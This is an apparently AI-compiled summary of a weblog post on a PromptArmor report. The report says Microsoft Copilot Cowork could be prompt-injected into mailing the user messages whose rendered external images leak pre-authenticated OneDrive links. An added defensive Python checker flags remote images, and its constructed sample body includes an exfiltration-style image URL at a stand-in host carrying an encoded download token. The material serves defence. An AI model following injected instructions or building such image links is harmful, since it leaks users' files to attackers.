Simon Willison's Weblog | May 26, 2026, 3:36 PM | Importance: 76

Microsoft Copilot Cowork Exfiltrates Files

Copilot Cowork could be prompt-injected into leaking OneDrive file links through rendered email images.

Simon Willison summarizes a PromptArmor report about Microsoft Copilot Cowork and agentic data exfiltration risks. The issue involved agents sending messages to a user’s own inbox without approval, where rendered external images could trigger requests to attacker-controlled sites. Because OneDrive can create pre-authenticated download links, a successful prompt injection could leak links that allow attackers to download files.
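A defensive check for the channel described above, as an added example that is not code from PromptArmor, Simon Willison or Microsoft: it audits an agent-drafted HTML message for remote images before the message is delivered or rendered. The allowlist, the host names and the sample body are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Assumption: hosts the mail client may fetch images from without review.
ALLOWED_IMAGE_HOSTS = {"assets.corp.example"}

class _ImgCollector(HTMLParser):
    """Collects the src attribute of every <img> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)

def audit_remote_images(html_body):
    """Return (src, reason) for each image that would cause an outbound fetch
    to a host outside the allowlist."""
    collector = _ImgCollector()
    collector.feed(html_body)
    findings = []
    for src in collector.sources:
        # Protocol-relative URLs are still remote fetches.
        parts = urlsplit("https:" + src if src.startswith("//") else src)
        if parts.scheme not in ("http", "https"):
            continue  # cid: and data: images trigger no network request
        if (parts.hostname or "").lower() in ALLOWED_IMAGE_HOSTS:
            continue
        # Decode twice so a double-encoded link in the path or query is seen.
        carried = unquote(unquote(parts.path + "?" + parts.query))
        if "http://" in carried or "https://" in carried:
            findings.append((src, "embedded-url"))  # image URL carries a link
        else:
            findings.append((src, "untrusted-host"))
    return findings

# Constructed sample body; none of these hosts or tokens are real.
SAMPLE_BODY = (
    '<p>Summary attached.</p>'
    '<img src="cid:logo@corp.example">'
    '<img src="https://assets.corp.example/banner.png">'
    '<img src="https://tracker.example/p.png?d=https%3A%2F%2Ffiles.example%2Fdl%3Ftoken%3DCONSTRUCTED">'
    '<img src="//cdn.example/pixel.gif">'
)

if __name__ == "__main__":
    for src, reason in audit_remote_images(SAMPLE_BODY):
        print(reason, src)
```

Any finding is a reason to strip the image or hold the message for user approval; an "embedded-url" finding is the stronger signal because the image request itself would carry a link off the tenant.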

Summary compiled by AI; the original article takes precedence.